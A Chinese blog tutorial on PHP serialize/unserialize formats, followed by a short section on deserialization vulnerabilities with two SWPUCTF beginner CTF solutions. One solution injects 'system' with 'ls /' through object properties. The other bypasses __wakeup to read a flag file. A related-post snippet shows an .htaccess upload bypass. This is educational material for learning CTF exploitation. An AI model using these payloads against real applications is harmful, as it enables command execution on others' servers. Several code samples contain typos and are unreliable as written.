序列化与反序列化

已于 2024-03-29 15:34:32 修改
阅读量360 收藏 4
点赞数 5
文章标签: php android
于 2024-03-22 15:16:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80913334/article/details/136869043
版权

目录

一、序列化基础知识

1、序列化的作用

2、表达方式

空符号

整形

浮点型

boolean型

字符串

数组

3、对象的序列化(不能序列化‘类’;可以序列化‘对象’)

public

 private

protected

成员属性调用对象

二、反序列化知识

1.反序列化的特性

1)反序列化之后的内容为一个对象;

2)反序列化生成的对象里的值,由反序列化里的值提供;与原有类预定义的值无关;

3)反序列化不触发类的成员方法;需要调用方法后才能触发

2.反序列化的作用

3.实例演示

反序列化之后的内容为一个对象

反序列化生成的对象里的值,由反序列化里的值提供;与原有类预定义的值无关;

反序列化不触发类的成员方法;需要调用方法后才能触发

三、反序列化漏洞

1.反序列化漏洞的成因

2.例题(例题中涉及魔术方法另行学习)

一、序列化基础知识

1、序列化的作用

序列化:将对象的状态信息(属性)转换为可以存储或传输的形式的过程

对象/数组\rightarrow字符串

在php中使用函数serialize()将对象或者数组进行序列化,并返回一个包含字节流的字符串来表示。

2、表达方式

  • 空符号
<?php
$a = null;
echo serialize($a);
?>
----------------------
N;    //N->null
  • 整形
<?php
$a = 666;
echo serialize($a);
?>
----------------------
i:666;    //i->int
  • 浮点型
<?php
$a = 66.6;
echo serialize($a);
?>
----------------------
d:66.6;    //d->double
  • boolean型
<?php
$a = ture;
echo serialize($a);
?>
----------------------
b:1;    //b->bool

<?php
$a = false;
echo serialize($a);
?>
----------------------
b:0;
  • 字符串
<?php
$a = 'lin';
echo serialize($a);
?>
----------------------
s:3:"lin";    //s->string 3->字符串长度
  • 数组
<?php
$a=array('lin','lin1','lin2');
echo $a[0];
echo serialize{$a};
?>
------------------------------
a:3 参数数量:{i:0 编号;s:3:"lin";i:1;s:4:"lin1";i:2;s:4:"lin2";}

3、对象的序列化(不能序列化‘类’;可以序列化‘对象’)

  • public
<?php
class test
{
    public $pub='lin';
    fuction state()
    {
        echo $this->pub;    
    }
}
$a=new test();
echo serialize($a);
?>
--------------------------
//只序列化成员变量,不序列化成员函数
O:4类名长度:"test"类名:1变量数量{s:3变量名字长度:"pub"变量名字;s:3值的长度:"lin"变量值;}    
//O->object,
  •  private

private私有属性序列化时在变量名前加“%00类名%00”

<?php
highlight_file(_FILE_);
class test
{
    private $pub='lin';
    function state()
    {
        echo $this->pub
    }
}
$a = new test();
echo serialize($a);
?>
------------------------------
O:4:"test":1{s:9:"testpub";s:3:"lin";}    //%00test%00pub,pub是test的私有属性
  • protected

protected受保护属性序列化时在变量名前加%00*%00

<?php
highlight_file(_FILE_);
class test
{
    protected $pub='lin';
    function state()
    {
        echo $this->pub
    }
}
$a = new test();
echo serialize($a);
?>
------------------------------
O:4:"test":1{s:6:"*pub";s:3:"lin";}    //%00*%00pub
  • 成员属性调用对象
<?php
class test
{
    var $pub='lin';
    function state()
    {
        echo $this->pub;
    }
}
class test2
{
    var $ben;
    function __contruct()    //__contruct魔术方法构造函数
    {
        $this->ben=new test();
    }
}
$a = new test2();
echo serialize($a);
?>
-----------------------------------------------------------
//实例化的对象$a的成员变量‘ben’调用实例化后的对象new test()
O:5:"test2":1{s:3:"ben";O:4:"test":1{s:3:"pub";s:3:"lin";}}

二、反序列化知识

1.反序列化的特性

1)反序列化之后的内容为一个对象;
2)反序列化生成的对象里的值,由反序列化里的值提供;与原有类预定义的值无关;
3)反序列化不触发类的成员方法;需要调用方法后才能触发

2.反序列化的作用

反序列化:将序列化后的参数还原成实例化的对象。

字符串\rightarrow对象

3.实例演示

  • 反序列化之后的内容为一个对象
<?php
class test
{
    public $a = 'lin';
    protected $b = 666;
    private $c = false;
    public function displayVar()
    {
        echo $this->a
    }
}
%d = 'O:4:"test";3:{s:1:"a";s:3:"lin";s:4:"%00*%00b";i:666;s:7:"%00test%00c";b:0;}';
$e = urldecode($d);
$f = unserialize($e);    //$f把字符串$e反序列化为对象
var_dump($f);    //var_dump()用于打印变量的相关信息,包括变量的类型、值、长度等
--------------------------------------------------------------------------------------
object(test)#1 (3) {
    ["a"]=>
    string(3) "lin"
    ["b":protected]=>
    int(666)
    ["c":"test":private]=>
    bool(false)
}
  • 反序列化生成的对象里的值,由反序列化里的值提供;与原有类预定义的值无关;
<?php
class test
{
    public $a = 'lin';
    protected $b = 666;
    private $c = false;
    public function displayVar()
    {
        echo $this->a
    }
}
%d = 'O:4:"test";3:{s:1:"a";s:5:"linge";s:4:"%00*%00b";i:888;s:7:"%00test%00c";b:1;}';
$e = urldecode($d);
$f = unserialize($e);    //$f把字符串$e反序列化为对象
var_dump($f);    //var_dump()用于打印变量的相关信息,包括变量的类型、值、长度等
--------------------------------------------------------------------------------------
object(test)#1 (3) {
    ["a"]=>
    string(5) "linge"
    ["b":protected]=>
    int(888)
    ["c":"test":private]=>
    bool(true)
}
  • 反序列化不触发类的成员方法;需要调用方法后才能触发
<?php
class test
{
    public $a = 'lin';
    protected $b = 666;
    private $c = false;
    public function displayVar()
    {
        echo $this->a    //没有被调用
    }
}
%d = 'O:4:"test";3:{s:1:"a";s:5:"linge";s:4:"%00*%00b";i:888;s:7:"%00test%00c";b:1;}';
$e = urldecode($d);
$f = unserialize($e);    //$f把字符串$e反序列化为对象
$f->displayVar();    //调用函数
--------------------------------------------------------------------------------------
linge

三、反序列化漏洞

1.反序列化漏洞的成因

反序列化过程中,unserialize()接收的值(字符串)可控;通过改变这个值(字符串),得到所需要的代码,即生成的对象的属性值。

通过调用方法,触发代码执行。

2.例题(例题中涉及魔术方法另行学习)

[SWPUCTF 2022 新生赛]1z_unserialize

构造payload

将lt的值变为system;将$lly的值变为ls /和cat,实现命令注入

<?php

class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
}
$a = new lyh();
$a->lt='system';
$a->lly='ls /';
echo serialize($a);

?>

[SWPUCTF 2022 新生赛]ez_ez_unserialize

构造payload

<?php
class X
{
    public $x = 'fllllllag.php';
}
$a=new X;
echo serialize($a);
?>

由于要绕过__wakeup()函数

?x=O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}修改为O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}

lin0-0_0
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
.Net序列化反序列化
小目标一个亿
03-30 5094
序列化,又称为串行化,是.NET运行时环境用来支持用户定义类型的流行的机制。序列化就是把一个对象保存到一个文件或数据库字段中去,反序列化就是在适当的时候把这个文件再转化成原来的对象使用。其目的是以某种存储形成使自定义对象持久化,或者将这种对象从一个地方传输到另一个地方。 1、.NET支持的对象序列化的几种方式。 二进制序列化:对象序列化之后是二进制形成的,通过BinaryFormatter类来...
Java IO篇:序列化反序列化
热门推荐
张维鹏的博客
01-12 1万+
两个服务之间要传输一个数据对象,就需要将对象转换成二进制流,通过网络传输到对方服务,再转换成对象,供服务方法调用。这个编码和解码的过程称之为序列化反序列化。所以序列化就是把 Java 对象变成二进制形式,本质上就是一个byte[]数组。将对象序列化之后,就可以写入磁盘进行保存或者通过网络中输出给远程服务了。反之,反序列化可以从网络或者磁盘中读取的字节数组,反序列化成对象,在程序中使用。
Java中对象序列化反序列化详解
09-03
本文将深入探讨Java中的对象序列化反序列化的概念、原理、实现方法以及相关的注意事项。 **一、对象序列化的概念和作用** 对象序列化是将一个Java对象转换成字节流的过程,这个字节流可以存储在磁盘上,也可以在...
XML序列化反序列化 实战
08-16
XML序列化反序列化是.NET框架中处理数据交换的重要技术,它允许我们将对象的状态转换为XML格式的数据,也可以将XML数据恢复为等效的对象。这个实战项目专注于使用C#实现这一过程,使得开发者能够方便地在XML文件和...
深入分析Java的序列化反序列化
12-22
序列化是一种对象持久化的手段。普遍应用在网络传输、RMI等场景中。本文通过分析ArrayList的序列化来介绍Java序列化的相关内容。主要涉及到以下几个问题:  怎么实现Java的序列化  为什么实现了java.io....
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 627
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
三级_网络技术_14_局域网技术基础及应用
2301_80961833的博客
07-12 440
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1129
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码。
阿里云短信PHP集成api类
最新发布
༺墨༒眉༻
07-17 158
无需安装sdk扩展包,直接引入类即可使用。
NSSCTF中24网安培训day1中web的题目
2302_78903258的博客
07-14 1060
我又试了大小写,双写,特殊后缀名绕过的方法,发现均不能绕过,我们用.htaccess文件进行绕过,先上传一个.htaccess文件,文件内容<FilesMatch ¡°.jpg¡±>SetHandler application/x-httpd-php</FilesMatch> //这是把php文件都当作jpg的图片格式。,也就是说它执行了下面这句,那么我们还需要传flag参数。giveme=flag&flag=giveme,输入后,发现如下直接返回了flag,也就是说,代码退出了并输出了flag。
php 实现栈
huanghm88的专栏
07-16 335
可以根据需要使用这些方法来操作栈。类,其中包含了入栈()和判断栈是否为空(
PHP小课堂】学习PHP中的字符串操作函数(三)
硬核项目经理
07-15 775
学习PHP中的字符串操作函数(三)继续我们的 PHP 中字符串函数的学习之旅。今天我们要学习的内容是除了 str_ 和 str 开头之外的其它函数,这些函数也有很多非常好玩的内容,让我们赶快进入主题吧。分隔、打断字符串关于这个分割字符串并成为数组,或者是反过来的将数组组合成字符串的功能来说,implode() 和 explode() 这两个函数真的是出镜率非常的高。所以它们的使用也不用我多做介绍了...
ns3-gym入门(三):在opengym基础上实现一个小小的demo
zoe2222226666的博客
07-15 421
因为官方给的"opengym""opengym-2"这两个例子都很简单,所以自己改了一个demo,把reward-action-state相互影响的关系表现出来
【填坑指南】PHP8报:Unable to load dynamic library ‘zip.so’ 错误
♀我爱摇滚,更爱金属乐♀
07-14 487
一开始我按照以前摸索出来的安装PHP7.3的成功经验来编译方法安装PHP8.3,发现以前的套路已经失效了。以上这堆命令可以成功安装php 8,其中最后一条命令 php -v 是查看php版本号,如果显示无误,那么恭喜你安装成功,不需要再往下折腾了。说明zip这个扩展没有正常开启,因为现在我们安装的是php 8.0,而我的系统里的php zip 扩展因为前面的反复折腾,已经搞不清楚是哪个版本了,因此报错。这种情况多数发生在PHP安装时因为各种原因失败后,残余的库与最后安装的PHP版本不兼容导致的。
深度解析PHP8 JIT技术:如何助力网站性能飞跃
likeshopgood的博客
07-15 794
PHP8的JIT加速器为开发者提供了一种强大的工具来提升网站的响应速度。通过实时将PHP源代码转换为机器代码,JIT加速器显著提高了代码的执行速度、优化了CPU利用率并减少了内存消耗。在实际应用中,JIT加速器可以加速页面加载、处理高并发请求并节省服务器资源,从而提高了网站的整体性能和用户体验。对于追求高性能和良好用户体验的网站来说,使用PHP8的JIT加速器无疑是一个明智的选择。关于我们。
Java对象序列化反序列化详解
"Java对象的序列化反序列化技术详解" Java对象的序列化反序列化是Java编程中的一项重要技术,它允许我们将Java对象转换为字节流,以便于存储或在网络中传输。这章内容主要涵盖以下几个方面: 1. **对象序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值